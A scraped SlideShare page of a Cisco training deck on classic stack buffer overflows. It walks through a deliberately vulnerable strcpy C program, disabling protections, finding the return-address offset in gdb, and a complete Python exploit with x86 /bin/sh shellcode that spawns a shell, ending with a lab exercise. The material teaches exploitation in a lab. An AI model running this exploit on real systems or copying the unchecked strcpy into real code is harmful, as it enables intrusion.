Location via proxy:   [ UP ]  
[Report a bug]   [Manage cookies]                
SlideShare a Scribd company logo

03 - Refresher on buffer overflow in the old days

A
Alexandre Moneger

The document discusses buffer overflow attacks and techniques for exploiting them on a vulnerable C program called "ch3". It describes how the program can be compiled without protections, how to determine the offset needed to overwrite the return address, and how to craft an exploit by placing shellcode and the address of the buffer in the input to redirect execution and gain a shell. Variations for dealing with small buffers or unpredictable addresses are also covered.

Related slideshows

Performance tweaks and tools for Linux (Joe Damato)
Performance tweaks and tools for Linux (Joe Damato)Performance tweaks and tools for Linux (Joe Damato)
Performance tweaks and tools for Linux (Joe Damato)
 
Mini CTF workshop dump
Mini CTF workshop dumpMini CTF workshop dump
Mini CTF workshop dump
 
Debugging Ruby Systems
Debugging Ruby SystemsDebugging Ruby Systems
Debugging Ruby Systems
 
1 of 15
Thank you Aleph One! Refresher on buffer overflow in the old days Alex Moneger Security Engineer
Buffer overflow refresher  First paper by Aleph One in 1996 in Phrack #49: http://www.phrack.org/issues.html?issue=49&id=14  No OS level protections at the time  Works by writing past the buffer end aka stuff more data into a buffer then it can hold  Goal is to overwrite something interesting control structure with our attacker data. Can de saved EIP, but can be any function pointer © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 2
Stack refresher (again ;))  Stack holds local variables, the address of the previous frame, the address of where to return to  Goal is to overwrite Saved EIP (referred to as SEIP)  If we control SEIP, we control where “ret” instruction will go, meaning we control EIP SEIP SEBP Local function storage © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 3
The “classic” cisco@kali:~/src/seccon/ch3$ pygmentize -g ch3.c #include <string.h> int vuln(char *stuff) { char buf[0x64] = {0}; strcpy(buf, stuff); return 1; } int main(int argc, char **argv) { vuln(argv[1]); return 0; }  “Buf” has no boundary checking. “stuff” is attacker controlled SEIP SEBP Buf © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 4
Making it exploitable  Previous program compiled with following options: cisco@kali:~/src/seccon/ch3$ sudo sysctl -a | grep randomize kernel.randomize_va_space = 0 cisco@kali:~/src/seccon/ch3$ cc ch3.c -fno-stack-protector -z execstack -U_FORTIFY_SOURCE –g -o ch3  See how many security features we are disabling?  Pretend we don’t have sources, find the size of the local stack storage in function prologue cisco@kali:~/src/seccon/ch3$ objdump -d -j .text -M intel ch3 | grep -i 'vuln>:' -A 10 | grep --color esp 804841d: 89 e5 mov ebp,esp 8048421: 83 c4 80 add esp,0xffffff80 cisco@kali:~/src/seccon/ch3$ python -c 'import exutil as e; print e.cmp2(0xffffff80)' -128 © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 5
Recon  Local storage for func is 128 bytes. Nothing says that our vulnerable buf starts at the beginning of that  Let’s figure out how much we need to overwrite to control EIP  Max overwrite size = ebp – esp + SEBP + SEIP = 128 + 4 + 4 = 136 SEIP SEBP ???? Buf ???? 1 2 8 © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 6
Finding the offsets manually cisco@kali:~/src/seccon/ch3$ python -c 'print "A =>", hex(ord("A")), "B =>", hex(ord("B"))' A => 0x41 B => 0x42 cisco@kali:~/src/seccon/ch3$ (invoke ch3 $(python -c 'print "A"*132+"B"*4')) || dmesg | tail -n 1 Segmentation fault [613635.624345] ch3[18312]: segfault at 41414141 ip 41414141 sp bffffcf0 error 14 cisco@kali:~/src/seccon/ch3$ (invoke ch3 $(python -c 'print "A"*128+"B"*4')) || dmesg | tail -n 1 Segmentation fault [613642.976497] ch3[18318]: segfault at 41414141 ip 41414141 sp bffffcf0 error 14 cisco@kali:~/src/seccon/ch3$ (invoke ch3 $(python -c 'print "A"*124+"B"*4')) || dmesg | tail -n 1 Segmentation fault [613663.605595] ch3[18325]: segfault at 41414141 ip 41414141 sp bffffcf0 error 14 cisco@kali:~/src/seccon/ch3$ # Continue decrementing by 4 cisco@kali:~/src/seccon/ch3$ (invoke ch3 $(python -c 'print "A"*112+"B"*4')) || dmesg | tail -n 1 Segmentation fault [613678.429167] ch3[18331]: segfault at 42424242 ip 42424242 sp bffffd00 error 14  Doing this properly => Use msf pattern_create.rb & pattern_offset.rb © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 7
We’re going to overflow!!! 1. Choose a shellcode 2. Compute it’s length: ie: 40 bytes 3. Add the proper padding to overwrite SEIP: 112 - 40 = 72 4. Find the address of our shellcode 5. Append to the buffer to redirect flow Shellcode Junk SC Add ress © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 8
Finding buffer address cisco@kali:~/src/seccon/ch3$ env -i gdb --quiet --args ./ch3 $(python -c 'print "A"*112+"BCDE"') Reading symbols from /home/cisco/src/seccon/ch3/ch3...done. gdb$ gdb$ !objdump -d -j .text -M intel ch3 | grep -i 'vuln>:' -A 22 | tail -n 5 804844e: 83 ec 80 sub esp,0xffffff80 8048451: 5b pop ebx 8048452: 5f pop edi 8048453: 5d pop ebp 8048454: c3 ret gdb$ gdb$ break *0x804844e Breakpoint 1 at 0x804844e: file ch3.c, line 9. gdb$ r gdb$ x/16w $esp 0xbffffc70: 0xbffffc8c 0xbffffec9 0xb7ffeff4 0xbffffd70 0xbffffc80: 0xb7fffac0 0xbffffd44 0xb7feb662 0x41414141 0xbffffc90: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffffca0: 0x41414141 0x41414141 0x41414141 0x41414141 gdb$ x/x 0xbffffc8c 0xbffffc8c: 0x41414141 gdb$ x/s 0xbffffc8c 0xbffffc8c: 'A' <repeats 112 times>, "BBBB" gdb$ x/2w $ebp 0xbffffcf8: 0x41414141 0x42424242 gdb$ si 5 --------------------------------------------------------------------------[regs] EAX: 00000001 EBX: 41414141 ECX: 00000000 EDX: 00000075 o d I t S z a P C ESI: 00000000 EDI: 41414141 EBP: 41414141 ESP: BFFFFD00 EIP: 42424242 CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007BError while running hook_stop: Cannot access memory at address 0x42424242 0x42424242 in ?? () © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 9
Summary  We have the overflow length: 116 bytes (112 bytes + 4 bytes SEIP overwrite)  We have the buffer’s address (0xbffffc8c)  We have a shellcode (I’m a nice guy)  Stuff all of it together © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 10
Shell time cisco@kali:~/src/seccon/ch3$ pygmentize ch3.py #!/usr/bin/env python # -*- coding: utf-8 -*- import os import struct target = "ch3" overflow_len = 112 ret_addr = 0xbffffc8c target_path = os.path.abspath(target) # setreuid(geteuid(),geteuid()); execve("/bin/sh",0,0) sc = ("x6ax31x58x99xcdx80x89xc3x89xc1x6ax46" "x58xcdx80xb0x0bx52x68x6ex2fx73x68x68" "x2fx2fx62x69x89xe3x89xd1xcdx80") nop_sled = overflow_len - len(sc) sc_addr = struct.pack("<I", ret_addr) ex = "%s%s%s" % (sc, 'A'*nop_sled, sc_addr) os.execve(target_path, (target_path, ex), os.environ) © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 11
Result cisco@kali:~/src/seccon/ch3$ invoke ch3.py $ id uid=1000(cisco) gid=1001(cisco) groups=1001(cisco) $ exit cisco@kali:~/src/seccon/ch3$ © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 12
Variations  Small buffers (shellcode doesn’t fit): append shellcode after ret address SC Add ress Junk Shellcode  Unpredictable buffer address (stack size is not under control): append NOP sled in front of shellcode: NOP sled Shellcode SC Add ress  Use an environment variable to host your shellcode © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 13
Limitations  Shellcode on executed on the stack, so stack needs to be executable  Buffer address is known, so addresses can’t be randomized  Stack frame is not protected (more on this later)  There are no null bytes in our buffer address (This can fixed easily) © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 14
Now get to work  Compile and exploit ch3  Try any different exploitation technique described previously  Don’t use the “invoke” script when trying to exploit. What is happening to the stack? Why is your exploit failing?  Enable one memory protection (whichever). Check the effect on the exploit © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 15

More Related Content

What's hot

Performance tweaks and tools for Linux (Joe Damato)
Performance tweaks and tools for Linux (Joe Damato)Performance tweaks and tools for Linux (Joe Damato)
Performance tweaks and tools for Linux (Joe Damato)
Ontico
 
Mini CTF workshop dump
Mini CTF workshop dumpMini CTF workshop dump
Mini CTF workshop dump
Ammarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
 
Debugging Ruby Systems
Debugging Ruby SystemsDebugging Ruby Systems
Debugging Ruby Systems
Engine Yard
 
Debugging Ruby
Debugging RubyDebugging Ruby
Debugging Ruby
Aman Gupta
 
2016年のPerl (Long version)
2016年のPerl (Long version)2016年のPerl (Long version)
2016年のPerl (Long version)
charsbar
 
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
Sheng-Hao Ma
 
Shellcodes for ARM: Your Pills Don't Work on Me, x86
Shellcodes for ARM: Your Pills Don't Work on Me, x86Shellcodes for ARM: Your Pills Don't Work on Me, x86
Shellcodes for ARM: Your Pills Don't Work on Me, x86
Svetlana Gaivoronski
 
32 shell-programming
32 shell-programming32 shell-programming
32 shell-programming
kayalkarnan
 
System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
System Hacking Tutorial #3 - Buffer Overflow - Egg HuntingSystem Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
sanghwan ahn
 
TDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on WindowsTDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on Windows
Sheng-Hao Ma
 
R-House (LSRC)
R-House (LSRC)R-House (LSRC)
R-House (LSRC)
Fernand Galiana
 
Publishing a Perl6 Module
Publishing a Perl6 ModulePublishing a Perl6 Module
Publishing a Perl6 Module
ast_j
 
Better detection of what modules are used by some Perl 5 code
Better detection of what modules are used by some Perl 5 codeBetter detection of what modules are used by some Perl 5 code
Better detection of what modules are used by some Perl 5 code
charsbar
 
NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27
Sheng-Hao Ma
 
A Stealthy Stealers - Spyware Toolkit and What They Do
A Stealthy Stealers - Spyware Toolkit and What They DoA Stealthy Stealers - Spyware Toolkit and What They Do
A Stealthy Stealers - Spyware Toolkit and What They Do
sanghwan ahn
 
Alexander Reelsen - Seccomp for Developers
Alexander Reelsen - Seccomp for DevelopersAlexander Reelsen - Seccomp for Developers
Alexander Reelsen - Seccomp for Developers
DevDay Dresden
 
Feb14 successful development
Feb14 successful developmentFeb14 successful development
Feb14 successful development
Connor McDonald
 
Kernel Recipes 2017 - Modern Key Management with GPG - Werner Koch
Kernel Recipes 2017 - Modern Key Management with GPG - Werner KochKernel Recipes 2017 - Modern Key Management with GPG - Werner Koch
Kernel Recipes 2017 - Modern Key Management with GPG - Werner Koch
Anne Nicolas
 
[2012 CodeEngn Conference 06] pwn3r - Secuinside 2012 CTF 예선 문제풀이
[2012 CodeEngn Conference 06] pwn3r - Secuinside 2012 CTF 예선 문제풀이[2012 CodeEngn Conference 06] pwn3r - Secuinside 2012 CTF 예선 문제풀이
[2012 CodeEngn Conference 06] pwn3r - Secuinside 2012 CTF 예선 문제풀이
GangSeok Lee
 
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIPSystem Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
sanghwan ahn
 

What's hot (20)

Performance tweaks and tools for Linux (Joe Damato)
Performance tweaks and tools for Linux (Joe Damato)Performance tweaks and tools for Linux (Joe Damato)
Performance tweaks and tools for Linux (Joe Damato)
 
Mini CTF workshop dump
Mini CTF workshop dumpMini CTF workshop dump
Mini CTF workshop dump
 
Debugging Ruby Systems
Debugging Ruby SystemsDebugging Ruby Systems
Debugging Ruby Systems
 
Debugging Ruby
Debugging RubyDebugging Ruby
Debugging Ruby
 
2016年のPerl (Long version)
2016年のPerl (Long version)2016年のPerl (Long version)
2016年のPerl (Long version)
 
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
 
Shellcodes for ARM: Your Pills Don't Work on Me, x86
Shellcodes for ARM: Your Pills Don't Work on Me, x86Shellcodes for ARM: Your Pills Don't Work on Me, x86
Shellcodes for ARM: Your Pills Don't Work on Me, x86
 
32 shell-programming
32 shell-programming32 shell-programming
32 shell-programming
 
System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
System Hacking Tutorial #3 - Buffer Overflow - Egg HuntingSystem Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
 
TDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on WindowsTDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on Windows
 
R-House (LSRC)
R-House (LSRC)R-House (LSRC)
R-House (LSRC)
 
Publishing a Perl6 Module
Publishing a Perl6 ModulePublishing a Perl6 Module
Publishing a Perl6 Module
 
Better detection of what modules are used by some Perl 5 code
Better detection of what modules are used by some Perl 5 codeBetter detection of what modules are used by some Perl 5 code
Better detection of what modules are used by some Perl 5 code
 
NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27
 
A Stealthy Stealers - Spyware Toolkit and What They Do
A Stealthy Stealers - Spyware Toolkit and What They DoA Stealthy Stealers - Spyware Toolkit and What They Do
A Stealthy Stealers - Spyware Toolkit and What They Do
 
Alexander Reelsen - Seccomp for Developers
Alexander Reelsen - Seccomp for DevelopersAlexander Reelsen - Seccomp for Developers
Alexander Reelsen - Seccomp for Developers
 
Feb14 successful development
Feb14 successful developmentFeb14 successful development
Feb14 successful development
 
Kernel Recipes 2017 - Modern Key Management with GPG - Werner Koch
Kernel Recipes 2017 - Modern Key Management with GPG - Werner KochKernel Recipes 2017 - Modern Key Management with GPG - Werner Koch
Kernel Recipes 2017 - Modern Key Management with GPG - Werner Koch
 
[2012 CodeEngn Conference 06] pwn3r - Secuinside 2012 CTF 예선 문제풀이
[2012 CodeEngn Conference 06] pwn3r - Secuinside 2012 CTF 예선 문제풀이[2012 CodeEngn Conference 06] pwn3r - Secuinside 2012 CTF 예선 문제풀이
[2012 CodeEngn Conference 06] pwn3r - Secuinside 2012 CTF 예선 문제풀이
 
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIPSystem Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
 

Viewers also liked

Practical rsa padding oracle attacks
Practical rsa padding oracle attacksPractical rsa padding oracle attacks
Practical rsa padding oracle attacks
Alexandre Moneger
 
你今天加班了嗎
你今天加班了嗎你今天加班了嗎
你今天加班了嗎
Wei-ming Chen
 
Joel s. goldsmith consciência do único poder
Joel s. goldsmith consciência do único poderJoel s. goldsmith consciência do único poder
Joel s. goldsmith consciência do único poder
Actor Quantum
 
CyberLab CCEH Session - 2 Footprinting and Reconnaissance
CyberLab CCEH Session - 2 Footprinting and ReconnaissanceCyberLab CCEH Session - 2 Footprinting and Reconnaissance
CyberLab CCEH Session - 2 Footprinting and Reconnaissance
CyberLab
 
Plan a Successful Information Management Solution Implementation
Plan a Successful Information Management Solution ImplementationPlan a Successful Information Management Solution Implementation
Plan a Successful Information Management Solution Implementation
J. Kevin Parker, CIP
 
Indicadores emprendimiento
Indicadores emprendimiento Indicadores emprendimiento
Indicadores emprendimiento
nico2754
 
20161112
20161112 20161112
20161112
佩琪 羅
 
資訊安全入門
資訊安全入門資訊安全入門
資訊安全入門
Tyler Chen
 
Web api scalability and performance
Web api scalability and performanceWeb api scalability and performance
Web api scalability and performance
Himanshu Desai
 
PCNA Trends 2017
PCNA Trends 2017PCNA Trends 2017
PCNA Trends 2017
Brian O'Gara
 
Tea making
Tea makingTea making
Tea making
Pasan Bandara
 
ROP ‘n’ ROLL, a peak into modern exploits
ROP ‘n’ ROLL, a peak into modern exploitsROP ‘n’ ROLL, a peak into modern exploits
ROP ‘n’ ROLL, a peak into modern exploits
Alexandre Moneger
 
Pentesting custom TLS stacks
Pentesting custom TLS stacksPentesting custom TLS stacks
Pentesting custom TLS stacks
Alexandre Moneger
 
NBTC#2 - Why instrumentation is cooler then ice
NBTC#2 - Why instrumentation is cooler then iceNBTC#2 - Why instrumentation is cooler then ice
NBTC#2 - Why instrumentation is cooler then ice
Alexandre Moneger
 
Defcon 22 - Stitching numbers - generating rop payloads from in memory numbers
Defcon 22 - Stitching numbers - generating rop payloads from in memory numbersDefcon 22 - Stitching numbers - generating rop payloads from in memory numbers
Defcon 22 - Stitching numbers - generating rop payloads from in memory numbers
Alexandre Moneger
 
Web2.0 attack and defence
Web2.0 attack and defenceWeb2.0 attack and defence
Web2.0 attack and defence
hackstuff
 
Research methodology
Research methodologyResearch methodology
Research methodology
Rolling Plans Pvt. Ltd.
 

Viewers also liked (19)

Practical rsa padding oracle attacks
Practical rsa padding oracle attacksPractical rsa padding oracle attacks
Practical rsa padding oracle attacks
 
党参
党参党参
党参
 
你今天加班了嗎
你今天加班了嗎你今天加班了嗎
你今天加班了嗎
 
Joel s. goldsmith consciência do único poder
Joel s. goldsmith consciência do único poderJoel s. goldsmith consciência do único poder
Joel s. goldsmith consciência do único poder
 
CyberLab CCEH Session - 2 Footprinting and Reconnaissance
CyberLab CCEH Session - 2 Footprinting and ReconnaissanceCyberLab CCEH Session - 2 Footprinting and Reconnaissance
CyberLab CCEH Session - 2 Footprinting and Reconnaissance
 
Plan a Successful Information Management Solution Implementation
Plan a Successful Information Management Solution ImplementationPlan a Successful Information Management Solution Implementation
Plan a Successful Information Management Solution Implementation
 
Indicadores emprendimiento
Indicadores emprendimiento Indicadores emprendimiento
Indicadores emprendimiento
 
20161112
20161112 20161112
20161112
 
資訊安全入門
資訊安全入門資訊安全入門
資訊安全入門
 
Web api scalability and performance
Web api scalability and performanceWeb api scalability and performance
Web api scalability and performance
 
韩国茶
韩国茶韩国茶
韩国茶
 
PCNA Trends 2017
PCNA Trends 2017PCNA Trends 2017
PCNA Trends 2017
 
Tea making
Tea makingTea making
Tea making
 
ROP ‘n’ ROLL, a peak into modern exploits
ROP ‘n’ ROLL, a peak into modern exploitsROP ‘n’ ROLL, a peak into modern exploits
ROP ‘n’ ROLL, a peak into modern exploits
 
Pentesting custom TLS stacks
Pentesting custom TLS stacksPentesting custom TLS stacks
Pentesting custom TLS stacks
 
NBTC#2 - Why instrumentation is cooler then ice
NBTC#2 - Why instrumentation is cooler then iceNBTC#2 - Why instrumentation is cooler then ice
NBTC#2 - Why instrumentation is cooler then ice
 
Defcon 22 - Stitching numbers - generating rop payloads from in memory numbers
Defcon 22 - Stitching numbers - generating rop payloads from in memory numbersDefcon 22 - Stitching numbers - generating rop payloads from in memory numbers
Defcon 22 - Stitching numbers - generating rop payloads from in memory numbers
 
Web2.0 attack and defence
Web2.0 attack and defenceWeb2.0 attack and defence
Web2.0 attack and defence
 
Research methodology
Research methodologyResearch methodology
Research methodology
 

Similar to 03 - Refresher on buffer overflow in the old days

02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack
Alexandre Moneger
 
08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one
Alexandre Moneger
 
Davide Berardi - Linux hardening and security measures against Memory corruption
Davide Berardi - Linux hardening and security measures against Memory corruptionDavide Berardi - Linux hardening and security measures against Memory corruption
Davide Berardi - Linux hardening and security measures against Memory corruption
linuxlab_conf
 
Unix executable buffer overflow
Unix executable buffer overflowUnix executable buffer overflow
Unix executable buffer overflow
Ammarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
 
PGCon 2014 - What Do You Mean my Database Server Core Dumped? - How to Inspec...
PGCon 2014 - What Do You Mean my Database Server Core Dumped? - How to Inspec...PGCon 2014 - What Do You Mean my Database Server Core Dumped? - How to Inspec...
PGCon 2014 - What Do You Mean my Database Server Core Dumped? - How to Inspec...
Faisal Akber
 
Airlover 20030324 1
Airlover 20030324 1Airlover 20030324 1
Airlover 20030324 1
Dr.Ravi
 
파이썬 개발환경 구성하기의 끝판왕 - Docker Compose
파이썬 개발환경 구성하기의 끝판왕 - Docker Compose파이썬 개발환경 구성하기의 끝판왕 - Docker Compose
파이썬 개발환경 구성하기의 끝판왕 - Docker Compose
raccoony
 
Linux networking
Linux networkingLinux networking
Linux networking
Arie Bregman
 
Secure Programming Practices in C++ (NDC Oslo 2018)
Secure Programming Practices in C++ (NDC Oslo 2018)Secure Programming Practices in C++ (NDC Oslo 2018)
Secure Programming Practices in C++ (NDC Oslo 2018)
Patricia Aas
 
Salesforce at Stacki Atlanta Meetup February 2016
Salesforce at Stacki Atlanta Meetup February 2016Salesforce at Stacki Atlanta Meetup February 2016
Salesforce at Stacki Atlanta Meetup February 2016
StackIQ
 
DCEU 18: Tips and Tricks of the Docker Captains
DCEU 18: Tips and Tricks of the Docker CaptainsDCEU 18: Tips and Tricks of the Docker Captains
DCEU 18: Tips and Tricks of the Docker Captains
Docker, Inc.
 
Improving the ZFS Userland-Kernel API with Channel Programs - BSDCAN 2017 - M...
Improving the ZFS Userland-Kernel API with Channel Programs - BSDCAN 2017 - M...Improving the ZFS Userland-Kernel API with Channel Programs - BSDCAN 2017 - M...
Improving the ZFS Userland-Kernel API with Channel Programs - BSDCAN 2017 - M...
Matthew Ahrens
 
Overloading Perl OPs using XS
Overloading Perl OPs using XSOverloading Perl OPs using XS
Overloading Perl OPs using XS
ℕicolas ℝ.
 
Csw2016 wheeler barksdale-gruskovnjak-execute_mypacket
Csw2016 wheeler barksdale-gruskovnjak-execute_mypacketCsw2016 wheeler barksdale-gruskovnjak-execute_mypacket
Csw2016 wheeler barksdale-gruskovnjak-execute_mypacket
CanSecWest
 
Im trying to run make qemu-nox In a putty terminal but it.pdf
Im trying to run make qemu-nox In a putty terminal but it.pdfIm trying to run make qemu-nox In a putty terminal but it.pdf
Im trying to run make qemu-nox In a putty terminal but it.pdf
maheshkumar12354
 
NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016
Mikhail Sosonkin
 
From Zero To Production (NixOS, Erlang) @ Erlang Factory SF 2016
From Zero To Production (NixOS, Erlang) @ Erlang Factory SF 2016From Zero To Production (NixOS, Erlang) @ Erlang Factory SF 2016
From Zero To Production (NixOS, Erlang) @ Erlang Factory SF 2016
Susan Potter
 
Being functional in PHP (PHPDay Italy 2016)
Being functional in PHP (PHPDay Italy 2016)Being functional in PHP (PHPDay Italy 2016)
Being functional in PHP (PHPDay Italy 2016)
David de Boer
 
Profiling your Applications using the Linux Perf Tools
Profiling your Applications using the Linux Perf ToolsProfiling your Applications using the Linux Perf Tools
Profiling your Applications using the Linux Perf Tools
emBO_Conference
 
Debugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 VersionDebugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 Version
Ian Barber
 

Similar to 03 - Refresher on buffer overflow in the old days (20)

02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack
 
08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one
 
Davide Berardi - Linux hardening and security measures against Memory corruption
Davide Berardi - Linux hardening and security measures against Memory corruptionDavide Berardi - Linux hardening and security measures against Memory corruption
Davide Berardi - Linux hardening and security measures against Memory corruption
 
Unix executable buffer overflow
Unix executable buffer overflowUnix executable buffer overflow
Unix executable buffer overflow
 
PGCon 2014 - What Do You Mean my Database Server Core Dumped? - How to Inspec...
PGCon 2014 - What Do You Mean my Database Server Core Dumped? - How to Inspec...PGCon 2014 - What Do You Mean my Database Server Core Dumped? - How to Inspec...
PGCon 2014 - What Do You Mean my Database Server Core Dumped? - How to Inspec...
 
Airlover 20030324 1
Airlover 20030324 1Airlover 20030324 1
Airlover 20030324 1
 
파이썬 개발환경 구성하기의 끝판왕 - Docker Compose
파이썬 개발환경 구성하기의 끝판왕 - Docker Compose파이썬 개발환경 구성하기의 끝판왕 - Docker Compose
파이썬 개발환경 구성하기의 끝판왕 - Docker Compose
 
Linux networking
Linux networkingLinux networking
Linux networking
 
Secure Programming Practices in C++ (NDC Oslo 2018)
Secure Programming Practices in C++ (NDC Oslo 2018)Secure Programming Practices in C++ (NDC Oslo 2018)
Secure Programming Practices in C++ (NDC Oslo 2018)
 
Salesforce at Stacki Atlanta Meetup February 2016
Salesforce at Stacki Atlanta Meetup February 2016Salesforce at Stacki Atlanta Meetup February 2016
Salesforce at Stacki Atlanta Meetup February 2016
 
DCEU 18: Tips and Tricks of the Docker Captains
DCEU 18: Tips and Tricks of the Docker CaptainsDCEU 18: Tips and Tricks of the Docker Captains
DCEU 18: Tips and Tricks of the Docker Captains
 
Improving the ZFS Userland-Kernel API with Channel Programs - BSDCAN 2017 - M...
Improving the ZFS Userland-Kernel API with Channel Programs - BSDCAN 2017 - M...Improving the ZFS Userland-Kernel API with Channel Programs - BSDCAN 2017 - M...
Improving the ZFS Userland-Kernel API with Channel Programs - BSDCAN 2017 - M...
 
Overloading Perl OPs using XS
Overloading Perl OPs using XSOverloading Perl OPs using XS
Overloading Perl OPs using XS
 
Csw2016 wheeler barksdale-gruskovnjak-execute_mypacket
Csw2016 wheeler barksdale-gruskovnjak-execute_mypacketCsw2016 wheeler barksdale-gruskovnjak-execute_mypacket
Csw2016 wheeler barksdale-gruskovnjak-execute_mypacket
 
Im trying to run make qemu-nox In a putty terminal but it.pdf
Im trying to run make qemu-nox In a putty terminal but it.pdfIm trying to run make qemu-nox In a putty terminal but it.pdf
Im trying to run make qemu-nox In a putty terminal but it.pdf
 
NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016
 
From Zero To Production (NixOS, Erlang) @ Erlang Factory SF 2016
From Zero To Production (NixOS, Erlang) @ Erlang Factory SF 2016From Zero To Production (NixOS, Erlang) @ Erlang Factory SF 2016
From Zero To Production (NixOS, Erlang) @ Erlang Factory SF 2016
 
Being functional in PHP (PHPDay Italy 2016)
Being functional in PHP (PHPDay Italy 2016)Being functional in PHP (PHPDay Italy 2016)
Being functional in PHP (PHPDay Italy 2016)
 
Profiling your Applications using the Linux Perf Tools
Profiling your Applications using the Linux Perf ToolsProfiling your Applications using the Linux Perf Tools
Profiling your Applications using the Linux Perf Tools
 
Debugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 VersionDebugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 Version
 

Recently uploaded

How BIM Modeling Services Revolutionize Architecture and Design.pdf
How BIM Modeling Services Revolutionize Architecture and Design.pdfHow BIM Modeling Services Revolutionize Architecture and Design.pdf
How BIM Modeling Services Revolutionize Architecture and Design.pdf
Chemionix Ltd
 
2300/2800 series Perkins diesel engine.pdf
2300/2800 series Perkins diesel engine.pdf2300/2800 series Perkins diesel engine.pdf
2300/2800 series Perkins diesel engine.pdf
haytham majed
 
Electrical and Electronics engineering power point presentation.
Electrical and Electronics engineering power point presentation.Electrical and Electronics engineering power point presentation.
Electrical and Electronics engineering power point presentation.
sameerkrdbg
 
Fuel-Dlivery-Project PowerPoint presentations
Fuel-Dlivery-Project PowerPoint presentationsFuel-Dlivery-Project PowerPoint presentations
Fuel-Dlivery-Project PowerPoint presentations
jithujithin657
 
Three Phase Induction Motors, Equivalent Circuits
Three Phase Induction Motors, Equivalent CircuitsThree Phase Induction Motors, Equivalent Circuits
Three Phase Induction Motors, Equivalent Circuits
Jason J Pulikkottil
 
Presentation on ergonomics in mining industry
Presentation on ergonomics in mining industryPresentation on ergonomics in mining industry
Presentation on ergonomics in mining industry
praku727
 
PCI Design Handbook Content and Updates.pptx
PCI Design Handbook Content and Updates.pptxPCI Design Handbook Content and Updates.pptx
PCI Design Handbook Content and Updates.pptx
gunjanatulbansal
 
一比一原版(uofs毕业证书)萨省大学毕业证如何办理
一比一原版(uofs毕业证书)萨省大学毕业证如何办理一比一原版(uofs毕业证书)萨省大学毕业证如何办理
一比一原版(uofs毕业证书)萨省大学毕业证如何办理
r07z26xt
 
UNIT-I-METAL CASTING PROCESSES -Manufact
UNIT-I-METAL CASTING PROCESSES -ManufactUNIT-I-METAL CASTING PROCESSES -Manufact
